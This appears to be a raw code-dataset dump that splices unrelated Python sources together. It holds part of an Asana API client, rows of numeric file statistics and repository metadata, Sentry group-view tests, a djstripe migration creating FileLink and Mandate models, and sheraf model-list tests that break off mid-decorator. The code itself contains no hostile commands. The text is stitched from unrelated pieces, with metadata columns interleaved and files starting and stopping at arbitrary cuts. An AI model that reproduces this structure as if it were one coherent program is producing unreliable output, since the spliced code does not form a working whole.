return self.client.post(path, params, **options)
def remove_follower_for_task(self, task_gid, params=None, **options):
"""Remove followers from a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}/removeFollowers".replace("{task_gid}", task_gid)
return self.client.post(path, params, **options)
def remove_project_for_task(self, task_gid, params=None, **options):
"""Remove a project from a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}/removeProject".replace("{task_gid}", task_gid)
return self.client.post(path, params, **options)
def remove_tag_for_task(self, task_gid, params=None, **options):
"""Remove a tag from a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}/removeTag".replace("{task_gid}", task_gid)
return self.client.post(path, params, **options)
def search_tasks_for_workspace(self, workspace_gid, params=None, **options):
"""Search tasks in a workspace
:param str workspace_gid: (required) Globally unique identifier for the workspace or organization.
:param Object params: Parameters for the request
- text {str}: Performs full-text search on both task name and description
- resource_subtype {str}: Filters results by the task's resource_subtype
- assignee_any {str}: Comma-separated list of user identifiers
- assignee_not {str}: Comma-separated list of user identifiers
- assignee_status {str}: One of `inbox`, `today`, `upcoming`, or `later`
- portfolios_any {str}: Comma-separated list of portfolio IDs
- projects_any {str}: Comma-separated list of project IDs
- projects_not {str}: Comma-separated list of project IDs
- projects_all {str}: Comma-separated list of project IDs
- sections_any {str}: Comma-separated list of section or column IDs
- sections_not {str}: Comma-separated list of section or column IDs
- sections_all {str}: Comma-separated list of section or column IDs
- tags_any {str}: Comma-separated list of tag IDs
- tags_not {str}: Comma-separated list of tag IDs
- tags_all {str}: Comma-separated list of tag IDs
- teams_any {str}: Comma-separated list of team IDs
- followers_any {str}: Comma-separated list of user identifiers
- followers_not {str}: Comma-separated list of user identifiers
- created_by_any {str}: Comma-separated list of user identifiers
- created_by_not {str}: Comma-separated list of user identifiers
- assigned_by_any {str}: Comma-separated list of user identifiers
- assigned_by_not {str}: Comma-separated list of user identifiers
- liked_by_any {str}: Comma-separated list of user identifiers
- liked_by_not {str}: Comma-separated list of user identifiers
- commented_on_by_any {str}: Comma-separated list of user identifiers
- commented_on_by_not {str}: Comma-separated list of user identifiers
- due_on_before {date}: ISO 8601 date string
- due_on_after {date}: ISO 8601 date string
- due_on {date}: ISO 8601 date string or `null`
- due_at_before {datetime}: ISO 8601 datetime string
- due_at_after {datetime}: ISO 8601 datetime string
- start_on_before {date}: ISO 8601 date string
- start_on_after {date}: ISO 8601 date string
- start_on {date}: ISO 8601 date string or `null`
- created_on_before {date}: ISO 8601 date string
- created_on_after {date}: ISO 8601 date string
- created_on {date}: ISO 8601 date string or `null`
- created_at_before {datetime}: ISO 8601 datetime string
- created_at_after {datetime}: ISO 8601 datetime string
- completed_on_before {date}: ISO 8601 date string
- completed_on_after {date}: ISO 8601 date string
- completed_on {date}: ISO 8601 date string or `null`
- completed_at_before {datetime}: ISO 8601 datetime string
- completed_at_after {datetime}: ISO 8601 datetime string
- modified_on_before {date}: ISO 8601 date string
- modified_on_after {date}: ISO 8601 date string
- modified_on {date}: ISO 8601 date string or `null`
- modified_at_before {datetime}: ISO 8601 datetime string
- modified_at_after {datetime}: ISO 8601 datetime string
- is_blocking {bool}: Filter to incomplete tasks with dependents
- is_blocked {bool}: Filter to tasks with incomplete dependencies
- has_attachment {bool}: Filter to tasks with attachments
- completed {bool}: Filter to completed tasks
- is_subtask {bool}: Filter to subtasks
- sort_by {str}: One of `due_date`, `created_at`, `completed_at`, `likes`, or `modified_at`, defaults to `modified_at`
- sort_ascending {bool}: Default `false`
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/workspaces/{workspace_gid}/tasks/search".replace("{workspace_gid}", workspace_gid)
return self.client.get_collection(path, params, **options)
def set_parent_for_task(self, task_gid, params=None, **options):
"""Set the parent of a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}/setParent".replace("{task_gid}", task_gid)
return self.client.post(path, params, **options)
def update_task(self, task_gid, params=None, **options):
"""Update a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}".replace("{task_gid}", task_gid)
return self.client.put(path, params, **options)
| 96.876957 | 517 | 0.707856 | 6,362 | 43,304 | 4.762025 | 0.044169 | 0.02195 | 0.014589 | 0.023171 | 0.926558 | 0.920848 | 0.914708 | 0.878961 | 0.857011 | 0.826215 | 0 | 0.003751 | 0.230487 | 43,304 | 446 | 518 | 97.09417 | 0.905411 | 0.786278 | 0 | 0.616541 | 0 | 0 | 0.136066 | 0.090094 | 0 | 0 | 0 | 0 | 0 | 1 | 0.203008 | false | 0 | 0 | 0 | 0.406015 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
49ad0d2d33f59a4862aa894bdc990f344fa98aa6 | 5,628 | py | Python | tests/sentry/web/frontend/groups/tests.py | SilentCircle/sentry | 6eed5c399047bdfb61abac9942b1248032b3302c | [
"BSD-3-Clause"
] | 2 | 2015-10-14T12:45:32.000Z | 2016-01-27T03:24:43.000Z | tests/sentry/web/frontend/groups/tests.py | SilentCircle/sentry | 6eed5c399047bdfb61abac9942b1248032b3302c | [
"BSD-3-Clause"
] | null | null | null | tests/sentry/web/frontend/groups/tests.py | SilentCircle/sentry | 6eed5c399047bdfb61abac9942b1248032b3302c | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import json
from django.core.urlresolvers import reverse
from sentry.models import GroupSeen
from sentry.constants import MAX_JSON_RESULTS
from sentry.testutils import TestCase, fixture
class GroupDetailsTest(TestCase):
@fixture
def path(self):
return reverse('sentry-group', kwargs={
'team_slug': self.team.slug,
'project_id': self.project.slug,
'group_id': self.group.id,
})
def test_simple(self):
self.login()
resp = self.client.get(self.path)
assert resp.status_code == 200
self.assertTemplateUsed(resp, 'sentry/groups/details.html')
assert 'group' in resp.context
assert 'project' in resp.context
assert 'team' in resp.context
assert resp.context['group'] == self.group
assert resp.context['project'] == self.project
assert resp.context['team'] == self.team
# ensure we've marked the group as seen
assert GroupSeen.objects.filter(
group=self.group, user=self.user).exists()
class GroupListTest(TestCase):
@fixture
def path(self):
return reverse('sentry-stream', kwargs={
'team_slug': self.team.slug,
'project_id': self.project.slug,
})
def test_does_render(self):
self.login()
resp = self.client.get(self.path)
assert resp.status_code == 200
self.assertTemplateUsed(resp, 'sentry/groups/group_list.html')
assert 'project' in resp.context
assert 'team' in resp.context
assert 'event_list' in resp.context
assert resp.context['project'] == self.project
assert resp.context['team'] == self.team
class GroupEventListTest(TestCase):
@fixture
def path(self):
return reverse('sentry-group-events', kwargs={
'team_slug': self.team.slug,
'project_id': self.project.slug,
'group_id': self.group.id,
})
def test_does_render(self):
self.login()
resp = self.client.get(self.path)
assert resp.status_code == 200
self.assertTemplateUsed(resp, 'sentry/groups/event_list.html')
assert 'group' in resp.context
assert 'project' in resp.context
assert 'team' in resp.context
assert 'event_list' in resp.context
assert resp.context['project'] == self.project
assert resp.context['team'] == self.team
assert resp.context['group'] == self.group
class GroupTagListTest(TestCase):
@fixture
def path(self):
return reverse('sentry-group-tags', kwargs={
'team_slug': self.team.slug,
'project_id': self.project.slug,
'group_id': self.group.id,
})
def test_does_render(self):
self.login()
resp = self.client.get(self.path)
assert resp.status_code == 200
self.assertTemplateUsed(resp, 'sentry/groups/tag_list.html')
assert 'group' in resp.context
assert 'project' in resp.context
assert 'team' in resp.context
assert 'tag_list' in resp.context
assert resp.context['project'] == self.project
assert resp.context['team'] == self.team
assert resp.context['group'] == self.group
class GroupEventDetailsTest(TestCase):
@fixture
def path(self):
return reverse('sentry-group-event', kwargs={
'team_slug': self.team.slug,
'project_id': self.project.slug,
'group_id': self.group.id,
'event_id': self.event.id,
})
def test_does_render(self):
self.login()
resp = self.client.get(self.path)
assert resp.status_code == 200
self.assertTemplateUsed(resp, 'sentry/groups/details.html')
assert 'group' in resp.context
assert 'project' in resp.context
assert 'team' in resp.context
assert 'event' in resp.context
assert resp.context['project'] == self.project
assert resp.context['team'] == self.team
assert resp.context['group'] == self.group
assert resp.context['event'] == self.event
class GroupEventListJsonTest(TestCase):
@fixture
def path(self):
return reverse('sentry-group-events-json', kwargs={
'team_slug': self.team.slug,
'project_id': self.project.slug,
'group_id': self.group.id,
})
def test_does_render(self):
self.login()
# HACK: force fixture creation
self.event
resp = self.client.get(self.path)
assert resp.status_code == 200
assert resp['Content-Type'] == 'application/json'
data = json.loads(resp.content)
assert len(data) == 1
assert data[0]['id'] == str(self.event.event_id)
def test_does_not_allow_beyond_limit(self):
self.login()
resp = self.client.get(self.path, {'limit': MAX_JSON_RESULTS + 1})
assert resp.status_code == 400
class GroupEventJsonTest(TestCase):
@fixture
def path(self):
return reverse('sentry-group-event-json', kwargs={
'team_slug': self.team.slug,
'project_id': self.project.slug,
'group_id': self.group.id,
'event_id_or_latest': self.event.id,
})
def test_does_render(self):
self.login()
resp = self.client.get(self.path)
assert resp.status_code == 200
assert resp['Content-Type'] == 'application/json'
data = json.loads(resp.content)
assert data['id'] == self.event.event_id
| 32.344828 | 74 | 0.613539 | 676 | 5,628 | 5.008876 | 0.137574 | 0.107206 | 0.069108 | 0.101004 | 0.808033 | 0.802717 | 0.802717 | 0.802717 | 0.789427 | 0.736267 | 0 | 0.00677 | 0.265103 | 5,628 | 173 | 75 | 32.531792 | 0.811896 | 0.015636 | 0 | 0.734266 | 0 | 0 | 0.1306 | 0.033237 | 0 | 0 | 0 | 0 | 0.363636 | 1 | 0.104895 | false | 0 | 0.041958 | 0.048951 | 0.244755 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
49f2f51e6c5ac68b02b531dcd3665b81f5cd6c98 | 11,470 | py | Python | djstripe/migrations/0008_2_5.py | ExtraE113/dj-stripe | 1b50be13fc99b624388a005b8aa1e26c57392203 | [
"MIT"
] | 937 | 2017-06-04T18:44:20.000Z | 2022-03-27T07:28:32.000Z | djstripe/migrations/0008_2_5.py | ExtraE113/dj-stripe | 1b50be13fc99b624388a005b8aa1e26c57392203 | [
"MIT"
] | 969 | 2017-06-05T01:57:20.000Z | 2022-03-31T23:42:54.000Z | djstripe/migrations/0008_2_5.py | ExtraE113/dj-stripe | 1b50be13fc99b624388a005b8aa1e26c57392203 | [
"MIT"
] | 309 | 2017-06-12T03:18:10.000Z | 2022-03-29T17:05:18.000Z | # Generated by Django 3.2.3 on 2021-05-30 23:47
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
import djstripe.enums
import djstripe.fields
class Migration(migrations.Migration):
dependencies = [
("djstripe", "0007_2_4"),
]
operations = [
migrations.RemoveField(
model_name="subscription",
name="tax_percent",
),
migrations.RemoveField(
model_name="countryspec",
name="djstripe_owner_account",
),
migrations.AddField(
model_name="card",
name="account",
field=djstripe.fields.StripeForeignKey(
blank=True,
help_text="The external account the charge was made on behalf of. Null here indicates that this value was never set.",
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="cards",
to="djstripe.account",
to_field=settings.DJSTRIPE_FOREIGN_KEY_TO_FIELD,
),
),
migrations.AddField(
model_name="card",
name="default_for_currency",
field=models.BooleanField(
help_text="Whether this external account (Card) is the default account for its currency.",
null=True,
),
),
migrations.AlterField(
model_name="bankaccount",
name="account",
field=djstripe.fields.StripeForeignKey(
blank=True,
help_text="The external account the charge was made on behalf of. Null here indicates that this value was never set.",
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="bank_accounts",
to="djstripe.account",
to_field=settings.DJSTRIPE_FOREIGN_KEY_TO_FIELD,
),
),
migrations.AlterField(
model_name="bankaccount",
name="default_for_currency",
field=models.BooleanField(
help_text="Whether this external account (BankAccount) is the default account for its currency.",
null=True,
),
),
migrations.RenameModel(
old_name="FileUpload",
new_name="File",
),
migrations.CreateModel(
name="FileLink",
fields=[
("djstripe_created", models.DateTimeField(auto_now_add=True)),
("djstripe_updated", models.DateTimeField(auto_now=True)),
(
"djstripe_id",
models.BigAutoField(
primary_key=True, serialize=False, verbose_name="ID"
),
),
("id", djstripe.fields.StripeIdField(max_length=255, unique=True)),
(
"livemode",
models.BooleanField(
blank=True,
default=None,
help_text="Null here indicates that the livemode status is unknown or was previously unrecorded. Otherwise, this field indicates whether this record comes from Stripe test mode or live mode operation.",
null=True,
),
),
(
"created",
djstripe.fields.StripeDateTimeField(
blank=True,
help_text="The datetime this object was created in stripe.",
null=True,
),
),
(
"metadata",
djstripe.fields.JSONField(
blank=True,
help_text="A set of key/value pairs that you can attach to an object. It can be useful for storing additional information about an object in a structured format.",
null=True,
),
),
(
"description",
models.TextField(
blank=True, help_text="A description of this object.", null=True
),
),
(
"expires_at",
djstripe.fields.StripeDateTimeField(
blank=True,
help_text="Time at which the link expires.",
null=True,
),
),
(
"url",
models.URLField(
help_text="The publicly accessible URL to download the file."
),
),
(
"djstripe_owner_account",
djstripe.fields.StripeForeignKey(
blank=True,
help_text="The Stripe Account this object belongs to.",
null=True,
on_delete=django.db.models.deletion.CASCADE,
to="djstripe.account",
to_field=settings.DJSTRIPE_FOREIGN_KEY_TO_FIELD,
),
),
(
"file",
djstripe.fields.StripeForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to="djstripe.file",
to_field=settings.DJSTRIPE_FOREIGN_KEY_TO_FIELD,
),
),
],
options={
"get_latest_by": "created",
"abstract": False,
},
),
migrations.CreateModel(
name="Mandate",
fields=[
("djstripe_created", models.DateTimeField(auto_now_add=True)),
("djstripe_updated", models.DateTimeField(auto_now=True)),
(
"djstripe_id",
models.BigAutoField(
primary_key=True, serialize=False, verbose_name="ID"
),
),
("id", djstripe.fields.StripeIdField(max_length=255, unique=True)),
(
"livemode",
models.BooleanField(
blank=True,
default=None,
help_text="Null here indicates that the livemode status is unknown or was previously unrecorded. Otherwise, this field indicates whether this record comes from Stripe test mode or live mode operation.",
null=True,
),
),
(
"created",
djstripe.fields.StripeDateTimeField(
blank=True,
help_text="The datetime this object was created in stripe.",
null=True,
),
),
(
"metadata",
djstripe.fields.JSONField(
blank=True,
help_text="A set of key/value pairs that you can attach to an object. It can be useful for storing additional information about an object in a structured format.",
null=True,
),
),
(
"description",
models.TextField(
blank=True, help_text="A description of this object.", null=True
),
),
(
"customer_acceptance",
djstripe.fields.JSONField(
help_text="Details about the customer's acceptance of the mandate."
),
),
(
"payment_method_details",
djstripe.fields.JSONField(
help_text="Additional mandate information specific to the payment method type."
),
),
(
"status",
djstripe.fields.StripeEnumField(
enum=djstripe.enums.MandateStatus,
help_text="The status of the mandate, which indicates whether it can be used to initiate a payment.",
max_length=8,
),
),
(
"type",
djstripe.fields.StripeEnumField(
enum=djstripe.enums.MandateType,
help_text="The status of the mandate, which indicates whether it can be used to initiate a payment.",
max_length=10,
),
),
(
"multi_use",
djstripe.fields.JSONField(
blank=True,
help_text="If this is a `multi_use` mandate, this hash contains details about the mandate.",
null=True,
),
),
(
"single_use",
djstripe.fields.JSONField(
blank=True,
help_text="If this is a `single_use` mandate, this hash contains details about the mandate.",
null=True,
),
),
(
"djstripe_owner_account",
djstripe.fields.StripeForeignKey(
blank=True,
help_text="The Stripe Account this object belongs to.",
null=True,
on_delete=django.db.models.deletion.CASCADE,
to="djstripe.account",
to_field=settings.DJSTRIPE_FOREIGN_KEY_TO_FIELD,
),
),
(
"payment_method",
djstripe.fields.StripeForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to="djstripe.paymentmethod",
to_field=settings.DJSTRIPE_FOREIGN_KEY_TO_FIELD,
),
),
],
options={
"get_latest_by": "created",
"abstract": False,
},
),
migrations.AlterField(
model_name="charge",
name="source",
field=djstripe.fields.PaymentMethodForeignKey(
blank=True,
help_text="The source used for this charge.",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="charges",
to="djstripe.djstripepaymentmethod",
),
),
migrations.AlterField(
model_name="customer",
name="default_source",
field=djstripe.fields.PaymentMethodForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="customers",
to="djstripe.djstripepaymentmethod",
),
),
]
| 39.551724 | 226 | 0.453357 | 913 | 11,470 | 5.558598 | 0.202629 | 0.036256 | 0.035862 | 0.046897 | 0.802956 | 0.788571 | 0.748374 | 0.716059 | 0.716059 | 0.716059 | 0 | 0.004931 | 0.469573 | 11,470 | 289 | 227 | 39.688581 | 0.829224 | 0.003923 | 0 | 0.723404 | 1 | 0.021277 | 0.23015 | 0.014882 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.017731 | 0 | 0.028369 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
b718fa776ba9f4e63ccaf94a507432240e214318 | 13,594 | py | Python | tests/attributes/test_model_list.py | yaal-coop/sheraf | 774e3781bc6ff2e16c6cc39f268d475b5e64fcea | [
"MIT"
] | null | null | null | tests/attributes/test_model_list.py | yaal-coop/sheraf | 774e3781bc6ff2e16c6cc39f268d475b5e64fcea | [
"MIT"
] | null | null | null | tests/attributes/test_model_list.py | yaal-coop/sheraf | 774e3781bc6ff2e16c6cc39f268d475b5e64fcea | [
"MIT"
] | null | null | null | import pytest
import sheraf
import tests
class AModel(tests.UUIDAutoModel):
name = sheraf.SimpleAttribute()
@pytest.mark.parametrize(
"attribute,list_type",
[
(sheraf.SmallListAttribute, sheraf.types.SmallList),
(sheraf.LargeListAttribute, sheraf.types.LargeList),
],
)
@pytest.mark.parametrize(
"model",
[
AModel,
f"{AModel.__module__}.{AModel.__name__}",
f"{AModel.__module__}.{AModel.__name__}".encode(),
],
)
def test_model_dict(sheraf_connection, attribute, list_type, model):
class AnotherModel(tests.UUIDAutoModel):
a_list_for_test = attribute(sheraf.ModelAttribute(AModel))
a = AModel.create()
b = AModel.create()
another = AnotherModel.create()
assert [] == list(another.a_list_for_test)
assert 0 == len(another.a_list_for_test)
assert not another.a_list_for_test
with pytest.raises(IndexError):
another.a_list_for_test[5]
another.a_list_for_test.append(a)
another.a_list_for_test.append(b)
_another = AnotherModel.read(another.id)
assert [a, b] == list(_another.a_list_for_test)
assert 2 == len(_another.a_list_for_test)
assert b == _another.a_list_for_test[1]
assert [b] == list(_another.a_list_for_test[1:])
assert a in _another.a_list_for_test
assert b in _another.a_list_for_test
assert not (AModel.create() in _another.a_list_for_test)
assert another.a_list_for_test
c = AModel.create()
d = AModel.create()
_another.a_list_for_test.extend([c, d])
assert [a, b, c, d] == list(_another.a_list_for_test)
other = AnotherModel.create()
other.a_list_for_test.extend([b, c])
assert [b, c] == list(other.a_list_for_test)
other.a_list_for_test.remove(b)
assert [c] == list(other.a_list_for_test)
another.a_list_for_test = [a, b]
_another = AnotherModel.read(another.id)
assert [a, b] == list(_another.a_list_for_test)
assert b == another.a_list_for_test.pop()
assert [a] == list(another.a_list_for_test)
_another.a_list_for_test.clear()
assert [] == list(_another.a_list_for_test)
@pytest.mark.parametrize(
"attribute,list_type",
[
(sheraf.SmallListAttribute, sheraf.types.SmallList),
(sheraf.LargeListAttribute, sheraf.types.LargeList),
],
)
def test_indices(sheraf_connection, attribute, list_type):
class Model(tests.UUIDAutoModel):
models = attribute(sheraf.ModelAttribute(AModel))
model = Model.create()
with pytest.raises(IndexError):
model.models[0]
with pytest.raises(IndexError):
model.models[0] = AModel.create()
with pytest.raises(IndexError):
model.models[-1]
with pytest.raises(IndexError):
model.models[-1] = AModel.create()
submodel = AModel.create()
model.models.append(submodel)
assert model.models[0] == submodel
model.models[0] = AModel.create()
with pytest.raises(IndexError):
model.models[1]
with pytest.raises(IndexError):
model.models[1] = AModel.create()
with pytest.raises(TypeError):
model.models["foo"]
with pytest.raises(TypeError):
model.models["foo"] = AModel.create()
@pytest.mark.parametrize(
"attribute,list_type",
[
(sheraf.SmallListAttribute, sheraf.types.SmallList),
(sheraf.LargeListAttribute, sheraf.types.LargeList),
],
)
def test_create(sheraf_database, attribute, list_type):
class Model(tests.UUIDAutoModel):
models = attribute(sheraf.ModelAttribute(AModel))
with sheraf.connection(commit=True):
model = Model.create(models=[{"name": "A"}, {"name": "B"}])
assert isinstance(model.mapping["models"], list_type)
assert isinstance(model.models[0], AModel)
assert isinstance(model.models[0].mapping, sheraf.types.SmallDict)
assert "A" == model.models[0].name
with sheraf.connection():
model = Model.read(model.id)
assert isinstance(model.mapping["models"], list_type)
assert isinstance(model.models[0], AModel)
assert isinstance(model.models[0].mapping, sheraf.types.SmallDict)
assert "A" == model.models[0].name
@pytest.mark.parametrize(
"attribute,list_type",
[
(sheraf.SmallListAttribute, sheraf.types.SmallList),
(sheraf.LargeListAttribute, sheraf.types.LargeList),
],
)
def test_update_edition(sheraf_database, attribute, list_type):
class Model(tests.UUIDAutoModel):
models = attribute(sheraf.ModelAttribute(AModel))
with sheraf.connection(commit=True):
model = Model.create(models=[{"name": "c"}, {"name": "c"}])
last_sub_id = model.models[0].id
with sheraf.connection(commit=True):
model.edit(value={"models": [{"name": "a"}, {"name": "b"}]}, edition=True)
assert isinstance(model.models[0], AModel)
assert isinstance(model.models[1], AModel)
x, y = list(model.models)
assert "a" == x.name
assert "b" == y.name
assert model.models[0].id == last_sub_id
with sheraf.connection():
model = Model.read(model.id)
assert isinstance(model.models[0], AModel)
assert isinstance(model.models[1], AModel)
x, y = list(model.models)
assert "a" == x.name
assert "b" == y.name
assert model.models[0].id == last_sub_id
@pytest.mark.parametrize(
"attribute,list_type",
[
(sheraf.SmallListAttribute, sheraf.types.SmallList),
(sheraf.LargeListAttribute, sheraf.types.LargeList),
],
)
def test_update_no_edition(sheraf_database, attribute, list_type):
class Model(tests.UUIDAutoModel):
models = attribute(sheraf.ModelAttribute(AModel))
with sheraf.connection(commit=True):
model = Model.create(models=[{"name": "c"}, {"name": "c"}])
last_sub_id = model.models[0].id
with sheraf.connection(commit=True):
model.edit(value={"models": [{"name": "a"}, {"name": "b"}]}, edition=False)
assert isinstance(model.models[0], AModel)
assert isinstance(model.models[1], AModel)
x, y = list(model.models)
assert "c" == x.name
assert "c" == y.name
assert model.models[0].id == last_sub_id
with sheraf.connection():
model = Model.read(model.id)
assert isinstance(model.models[0], AModel)
assert isinstance(model.models[1], AModel)
x, y = list(model.models)
assert "c" == x.name
assert "c" == y.name
assert model.models[0].id == last_sub_id
@pytest.mark.parametrize(
"attribute,list_type",
[
(sheraf.SmallListAttribute, sheraf.types.SmallList),
(sheraf.LargeListAttribute, sheraf.types.LargeList),
],
)
def test_update_replacement(sheraf_database, attribute, list_type):
class Model(tests.UUIDAutoModel):
models = attribute(sheraf.ModelAttribute(AModel))
with sheraf.connection(commit=True):
model = Model.create(models=[{"name": "c"}, {"name": "c"}])
last_sub_id = model.models[0].id
with sheraf.connection(commit=True):
model.edit(value={"models": [{"name": "a"}, {"name": "b"}]}, replacement=True)
assert isinstance(model.models[0], AModel)
assert isinstance(model.models[1], AModel)
x, y = list(model.models)
assert "a" == x.name
assert "b" == y.name
assert model.models[0].id != last_sub_id
with sheraf.connection():
model = Model.read(model.id)
assert isinstance(model.models[0], AModel)
assert isinstance(model.models[1], AModel)
x, y = list(model.models)
assert "a" == x.name
assert "b" == y.name
assert model.models[0].id != last_sub_id
@pytest.mark.parametrize(
"attribute,list_type",
[
(sheraf.SmallListAttribute, sheraf.types.SmallList),
(sheraf.LargeListAttribute, sheraf.types.LargeList),
],
)
def test_update_addition(sheraf_database, attribute, list_type):
class Model(tests.UUIDAutoModel):
models = attribute(sheraf.ModelAttribute(AModel))
with sheraf.connection(commit=True):
model = Model.create(models=[{"name": "a"}])
with sheraf.connection(commit=True):
model.edit(value={"models": [{"name": "a"}, {"name": "b"}]}, addition=True)
assert isinstance(model.mapping["models"], list_type)
assert isinstance(model.models[1], AModel)
assert isinstance(model.models[1].mapping, sheraf.types.SmallDict)
assert "a" == model.models[0].name
assert "b" == model.models[1].name
with sheraf.connection():
model = Model.read(model.id)
assert isinstance(model.mapping["models"], list_type)
assert isinstance(model.models[1], AModel)
assert isinstance(model.models[1].mapping, sheraf.types.SmallDict)
assert "a" == model.models[0].name
assert "b" == model.models[1].name
@pytest.mark.parametrize(
"attribute,list_type",
[
(sheraf.SmallListAttribute, sheraf.types.SmallList),
(sheraf.LargeListAttribute, sheraf.types.LargeList),
],
)
def test_update_no_addition(sheraf_database, attribute, list_type):
class Model(tests.UUIDAutoModel):
models = attribute(sheraf.ModelAttribute(AModel))
with sheraf.connection(commit=True):
model = Model.create(models=[{"name": "a"}])
with sheraf.connection(commit=True):
model.edit(value={"models": [{"name": "a"}, {"name": "b"}]}, addition=False)
assert isinstance(model.mapping["models"], list_type)
assert "a" == model.models[0].name
assert len(model.models) == 1
with sheraf.connection():
model = Model.read(model.id)
assert isinstance(model.mapping["models"], list_type)
assert "a" == model.models[0].name
assert len(model.models) == 1
@pytest.mark.parametrize(
"attribute,list_type",
[
(sheraf.SmallListAttribute, sheraf.types.SmallList),
(sheraf.LargeListAttribute, sheraf.types.LargeList),
],
)
def test_update_deletion(sheraf_database, attribute, list_type):
class Model(tests.UUIDAutoModel):
models = attribute(sheraf.ModelAttribute(AModel))
with sheraf.connection(commit=True):
model = Model.create(models=[{"name": "a"}])
with sheraf.connection(commit=True):
model.edit(value={"models": []}, deletion=True)
assert isinstance(model.mapping["models"], list_type)
assert 0 == len(model.models)
with sheraf.connection():
model = Model.read(model.id)
assert isinstance(model.mapping["models"], list_type)
assert 0 == len(model.models)
@pytest.mark.parametrize(
"attribute,list_type",
[
(sheraf.SmallListAttribute, sheraf.types.SmallList),
(sheraf.LargeListAttribute, sheraf.types.LargeList),
],
)
def test_update_no_deletion(sheraf_database, attribute, list_type):
class Model(tests.UUIDAutoModel):
models = attribute(sheraf.ModelAttribute(AModel))
with sheraf.connection(commit=True):
model = Model.create(models=[{"name": "a"}])
with sheraf.connection(commit=True):
model.edit(value={"models": []}, deletion=False)
assert isinstance(model.mapping["models"], list_type)
assert 1 == len(model.models)
with sheraf.connection():
model = Model.read(model.id)
assert isinstance(model.mapping["models"], list_type)
assert 1 == len(model.models)
@pytest.mark.parametrize(
"attribute,list_type",
[
